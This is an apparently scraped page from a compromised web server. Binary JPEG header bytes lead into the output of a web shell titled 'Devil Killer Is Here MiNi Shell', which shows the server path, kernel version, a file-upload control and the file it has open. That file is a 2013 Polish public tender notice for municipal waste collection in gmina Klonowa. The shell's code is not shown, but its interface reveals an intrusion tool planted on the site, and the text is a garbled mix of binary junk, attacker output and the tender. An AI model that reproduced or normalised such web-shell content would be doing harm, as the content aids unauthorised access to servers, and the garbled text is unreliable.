JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130514/187906-N-2013.html

<p class="kh_header"><b>Klonowa: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Klonowa.</b><br>
<b>Numer ogłoszenia: 187906 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Klonowa , ul. ks. Józefa Dalaka 2, 98-273 Klonowa, woj. łódzkie, tel. 043 8208493, faks 043 8208485.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klonowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Klonowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Klonowa, obejmujący: 

Zadanie nr 1

1.	Przedmiotem Zamówienia jest usługa polegająca na odbieraniu i zagospodarowaniu odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy, a powstają odpady komunalne z terenu gminy Klonowa oraz wyposażenie w/w nieruchomości w pojemniki na odpady zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Klonowa.
2.	Odpady będą odbierane z terenu gminy zgodnie ze szczegółowym wykazem nieruchomości (obejmującym ilość i rodzaj pojemników w które ma być wyposażona każda nieruchomość), który zostanie dostarczony wykonawcy w dniu podpisania umowy. Informacje w wykazie będą uaktualniane przez zamawiającego do ostatniego dnia każdego miesiąca. 
3.	Wykonawca zobowiązany będzie w ramach umowy do przygotowania harmonogramu odbioru odpadów oraz jego dystrybucji wśród właścicieli nieruchomości w terminie do dnia 1 lipca 2013 r.
4.	Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie:
1)	Niesegregowanych (zmieszanych) odpadów komunalnych o kodzie 20 03 01.
2)	Segregowanych odpadów komunalnych z podziałem na następujące frakcje:
a)	Odpady suche o kodach 15 01 06, 20 01 01, 20 01 40 (papier, metal, tworzywa sztuczne, opakowania wielomateriałowe);
b)	Opakowania ze szkła o kodzie 15 01 07;
c)	Opakowania z tworzyw sztucznych o kodzie 15 01 02;
3)	Zużytych baterii o kodzie 20 01 34 z placówek oświatowych i instytucji publicznych. Wykaz lokalizacji pojemników na baterie stanowi załącznik nr 8 do SIWZ.
5.	 Odpady komunalne będą odbierane zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Klonowa z następujących pojemników:
1)	Niesegregowane (zmieszane) odpady komunalne:
a)	w zabudowie jednorodzinnej - pojemniki o pojemności od 0,12 m3 (120 l),
b)	w zabudowie wielorodzinnej - pojemniki o pojemności od 0,12 m3 (120 l),
c)	w obiektach użyteczności publicznej - pojemniki o pojemności od 0,12 m3 (120 l),
d)	na cmentarzach pojemniki o pojemności 1,1 m3 oraz KP-7 (7 m3).
2)	Segregowane odpady komunalne:
a)	w zabudowie jednorodzinnej - pojemniki o pojemności od 0,12 m3 (120 l),
b)	w zabudowie wielorodzinnej - pojemniki o pojemności od 0,12 m3 (120 l),
c)	 na nieruchomościach przeznaczonych do użytku publicznego pojemniki w gnieździe ogólnodostępnym na szkło o pojemności od 1,5 m3 (typ IGLOO), pojemniki na tworzywa sztuczne od 1,1 m3, pojemniki na makulaturę od 1,1 m3,
d)	w obiektach użyteczności publicznej - pojemniki o pojemności od 0,12 m3 (120 l).
6.	Odpady komunalne, będą odbierane z pojemników wyłącznie do tego celu przeznaczonych, oznaczonych ujednoliconym kolorem zgodnie z Regulaminem utrzymania czystości i porządku na terenie Gminy Klonowa:
a)	zielonym - z przeznaczeniem na odpady komunalne zmieszane,
b)	żółtym - z przeznaczeniem na odpady suche,
c)	pomarańczowym - z przeznaczeniem na szkło,
d)	zielonym - pojemniki w gniazdach ogólnodostępnych z przeznaczeniem na szkło kolorowe, 
e)	białym - pojemniki w gniazdach ogólnodostępnych z przeznaczeniem na szkło bezbarwne, 
f)	bez oznaczenia kolorem pojemniki z siatki w gniazdach ogólnodostępnych z przeznaczeniem na tworzywa sztuczne.
7.	Wykonawca wyposaży wskazane przez Zamawiającego nieruchomości w pojemniki zgodnie z wykazem o którym mowa w punkcie 2. z zachowaniem zasad określonych w pkt. 5. i 6.
Zamawiający zastrzega, iż objęcie wszystkich mieszkańców nieruchomości systemem odbioru odpadów komunalnych powinno nastąpić w terminie 30 dni od momentu zawarcia umowy, nie później niż do dnia 1 lipca 2013 r. 
Wykonawca przedstawi zamawiającemu wykaz nieruchomości wraz z informacją o rodzaju i pojemności pojemników w które zostały wyposażone te nieruchomości oraz wykaz nieruchomości objętych wykazem określonym w pkt. 2., które nie zostały wyposażone w pojemniki, z podaniem przyczyny nie wyposażenia nieruchomości w pojemniki, w terminie do dnia 6 lipca 2013 r. 
W przypadku gdy w wyniku aktualizacji wykazu określonego w pkt. 2. zaistnieje potrzeba wyposażenia w pojemniki nowych nieruchomości Wykonawca dokona tego w terminie 7 dni od dnia otrzymania uaktualnionego wykazu.
8.	 Szacunkowe ilości pojemników i odpadów przedstawione w poniższej tabeli nie są zależne od Zamawiającego. Podane ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego uwzględniając powstawanie nowych nieruchomości oraz migracje ludności.

  
Szacowana ilość odpadów komunalnych i pojemników:
1. Odpady komunalne zmieszane: 
- 120l - 679 szt.
- 240l - 67 szt. 
- 1100l - 7 szt.
2. Odpady opakowaniowe szklane:
- 120l - 711 szt.
- 240l - 33 szt.
- 1500l - 1 szt.
3. Surowce suche:
- 240l - 724 szt.
- 480l (lub 2x240l) - 20 szt.
4. Opakowania z tworzyw sztucznych:
- 2500l - 1 szt.
5. Baterie i akumulatory
- 120l - 3 szt.
	
Szacowana ilość odpadów do odbioru w trakcie realizacji przedmiotu zamówienia
(wynikająca z pojemności koszy):
1. Niesegregowane (zmieszane) odpady komunalne (20 03 01) - 105,26 m3/m-c,
2. Odpady suche (papier, metal, tworzywa sztuczne, opakowania wielomateriałowe) (15 01 06, 20 01 01, 20 01 40) - 183,36 m3/m-c,
3. Opakowania ze szkła (15 01 07) - 93,99 m3/m-c,
4. Opakowania z tworzyw sztucznych	(15 01 02) - 1,25 m3/m-c,
5. Baterie i akumulatory (20 01 34) - 0,003 m3/m-c.

9.	Odpady komunalne będą odbierane z następującą częstotliwością zgodną z Regulaminem utrzymania czystości i porządku na terenie Gminy Klonowa:
1)	Niesegregowane (zmieszane) odpady komunalne:
a)	Zabudowa jednorodzinna - 1 raz w miesiącu,
b)	Zabudowa wielorodzinna - 1 razy w miesiącu.
2)	Segregowane odpady komunalne:
a)	Surowce suche - 1 raz w miesiącu,
b)	Opakowania szklane - 1 raz na kwartał,
c)	Opakowania szklane w gniazdach ogólnodostępnych - w zależności od potrzeb w terminie do 7 dni od zgłoszenia przez zamawiającego,
d)	Opakowania z tworzyw sztucznych w gniazdach ogólnodostępnych - w zależności od potrzeb w terminie do7 dni od zgłoszenia przez zamawiającego,
e)	Baterie i akumulatory - w zależności od potrzeb w terminie 7 dni od zgłoszenia przez zamawiającego.

Zadanie nr 2

10.	Przedmiotem zamówienia jest usługa polegająca na wyposażeniu Punktu Selektywnego Zbierania Odpadów Komunalnych oraz odbieraniu i zagospodarowaniu odpadów komunalnych zgromadzonych w PSZOK.
11.	Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie następujących odpadów:
a)	Przeterminowanych leków o kodzie 20 01 32,
b)	Chemikaliów (farby, rozpuszczalniki, oleje odpadowe) o kodach 20 01 13*, 20 01 14*, 20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*,
c)	Zużytych baterii i akumulatorów o kodzie 20 01 34,
d)	Zużytego sprzętu elektrycznego i elektronicznego o kodach 20 01 23, 20 01 35*, 20 01 36,
e)	Odpadów wielkogabarytowych o kodzie 20 03 07,
f)	Odpadów budowlano - rozbiórkowych o kodach z grupy 17,
g)	Zużytych opon o kodzie 16 01 03,
h)	Odpadów zielonych o kodzie 20 02 01,
i)	Opakowań ze szkła o kodzie 15 01 07,
j)	Opakowań z tworzyw sztucznych o kodzie 15 01 02,
k)	Opakowań z papieru i tektury o kodzie 15 01 01.
12.	Wykonawca wyposaży Punkt Selektywnego Zbierania Odpadów Komunalnych w następujące pojemniki do gromadzenia odpadów:
a)	Przeterminowane leki - pojemnik o pojemności 240 l,
b)	Chemikalia (farby, rozpuszczalniki, oleje odpadowe) - 2 pojemniki o pojemności 240 l
c)	Zużyte baterie i akumulatory - pojemnik o pojemności 120 l,
d)	Odpady budowlano - rozbiórkowe - kontener 5,5 m3,
e)	Odpady zielone - kontener 1,1m3,
f)	Opakowania ze szkła - pojemnik o pojemności 1,5 m3 (typ IGLOO),
g)	Opakowania z tworzyw sztucznych - pojemnik o pojemności 2,5 m3 (typ SIATKA),
h)	Opakowania z papieru i tektury - pojemnik o pojemności 1,1 m3.
13.	Odpady niewymienione w pkt. 12. będą gromadzone w wyznaczonych miejscach na terenie PSZOK.
14.	Odpady wymienione w pkt. 11. będą odbierane z częstotliwością wynikającą z potrzeb z uwzględnieniem stopnia zapełnienia pojemnika. Wykonawca jest zobowiązany do odbioru odpadów w terminie 7 dni od dnia zgłoszenia przez zamawiającego.
15.	Szacowana ilość odpadów do odbioru w trakcie realizacji przedmiotu zamówienia:

1. Przeterminowane leki (20 01 32) - 0,002 Mg/m-c,
2. Chemikalia (20 01 13*, 20 01 14*, 20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*) - 0,010 Mg/m-c,
3. Zużyte baterie i akumulatory (20 01 34) - 0,003 Mg/m-c,
4. Zużyty sprzęt elektryczny i elektroniczny (20 01 23, 20 01 35*, 20 01 36) - 0,050 Mg/m-c,
5. Odpady wielkogabarytowe (20 03 07) - 0,050 Mg/m-c,
6. Odpady budowlano - rozbiórkowe (grupa 17) - 0,300 Mg/m-c,
7. Zużyte opony (16 01 03) - 0,050 Mg/m-c,
8. Odpady zielone (20 02 01) - 0,010 Mg/m-c,
9. Opakowania ze szkła (15 01 07) - 0,060 Mg/m-c,
10. Opakowania z tworzyw sztucznych (15 01 02) - 0,020 Mg/m-c,
11. Opakowania z papieru i tektury (15 01 01) - 0,030 Mg/m-c.

Zadanie nr 3

16.	Przedmiotem zamówienia jest zbiórka odpadów określonych w pkt. 17., pochodzących z gospodarstw domowych polegająca na przejeździe i załadunku odpadów zgodnie z harmonogramem.
17.	Zadanie polega na:
a)	zebraniu i załadunku na środek transportu wystawionych następujących rodzajów odpadów:
- 20 03 07 	- Odpady wielkogabarytowe,
(wersalki, tapczany, łóżka, fotele, elementy stolarki, okna, dywany, wykładziny),
- 20 01 35 *	- Zużyte urządzenia elektryczne i elektroniczne (telewizory, monitory),
- 20 01 36 	- Zużyte urządzenia elektryczne i elektroniczne (pralki, radia, drukarki, odkurzacze),
- 20 01 23 *	- Urządzenia zawierające freony (lodówki);
b)	zagospodarowaniu odebranych odpadów;
c)	posprzątaniu miejsc, z których odbierane są wystawione odpady.
18.	Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty gospodarcze. 
19.	Odpady o których mowa w pkt. 17. w ramach zbiórki objazdowej będą odbierane jeden raz w roku w terminie od 01.04.2014 r. do 30. 06. 2014 r.
20.	Termin odbioru w/w odpadów zostanie uzgodniony pomiędzy Zamawiającym a Wykonawcą na 3 miesiące przed planowaną zbiórką.
21.	Wykonawca przedłoży harmonogram odbioru odpadów w terminie 30 dni przed rozpoczęciem zbiórki.

Informacje dodatkowe:
22.	Mapa Gminy Klonowa stanowi załącznik nr 7 do SIWZ.
23.	Łączna liczba mieszkańców gminy Klonowa wynosi około 3000 osób.
24.	Szacunkowa liczba nieruchomości, z których będą odbierane odpady, wynosi około 680..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.53.30.00-2, 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający uzna, że Wykonawca spełnia ten warunek jeżeli przedstawi:
a)	wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami Ustawy z dn. 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (Dz.U. z 2012 r., poz. 391),
b)	aktualne zezwolenie na zbieranie, transport, odzysk bądź unieszkodliwienie odpadów komunalnych zgodnie z wymogami Ustawy o odpadach.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia - warunkiem udziału w postępowaniu w zakresie wiedzy i doświadczenia jest wykonanie w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi odpowiadającej rodzajem i wartością przedmiotowemu zamówieniu, tj. wykonanie usługi polegającej na wywozie odpadów komunalnych z terenu nieruchomości w ilości nie mniejszej niż 300 Mg w czasie świadczenia usług przez 12 kolejnych miesięcy - ocena spełnienia warunku zostanie dokonana na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. W wykazie należy wskazać wyłącznie usługi polegające na wywozie odpadów komunalnych z terenu nieruchomości.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie potencjałem technicznym: Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca:
a)	będzie dysponował na czas realizacji zadania pojazdami trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości oraz wyposażonymi w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiającego trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o miejscach wyładunku odpadów, w ilości:
-	co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych,
-	co najmniej 2 samochodami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
-	co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej.
b)	posiada bazę magazynowo - transportową:
-	usytuowaną w odległości nie większej niż 60 km od granicy Gminy Klonowa,
-	usytuowaną na terenie, do którego Wykonawca posiada tytuł prawny,
-	wyposażaną w miejsce przeznaczone do parkowania pojazdów, zabezpieczone przed emisją zanieczyszczeń do gruntu,
-	wyposażaną w miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych,
-	wyposażaną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie bazy następuje magazynowanie odpadów,
-	wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych,
-	wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
-	na terenie której znajduje się punkt konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów.
zgodnie z Rozporządzeniem Ministra Środowiska z dn. 11.01.2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (DZ.U. z 2013 r. poz. 122). Ocena spełnienia warunku zostanie dokonana na podstawie wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia, którego wzór stanowi załącznik nr 9.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie osobami zdolnymi do wykonania zamówienia - Zamawiający nie stawia szczegółowych wymagań w tym zakresie - ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia z art. 44 Prawa zamówień publicznych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa - warunkiem udziału w postępowaniu w zakresie sytuacji ekonomicznej i finansowej jest posiadanie ważnego ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200 000, 00 - ocena spełnienia warunku zostanie dokonana na podstawie opłaconej polisy, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
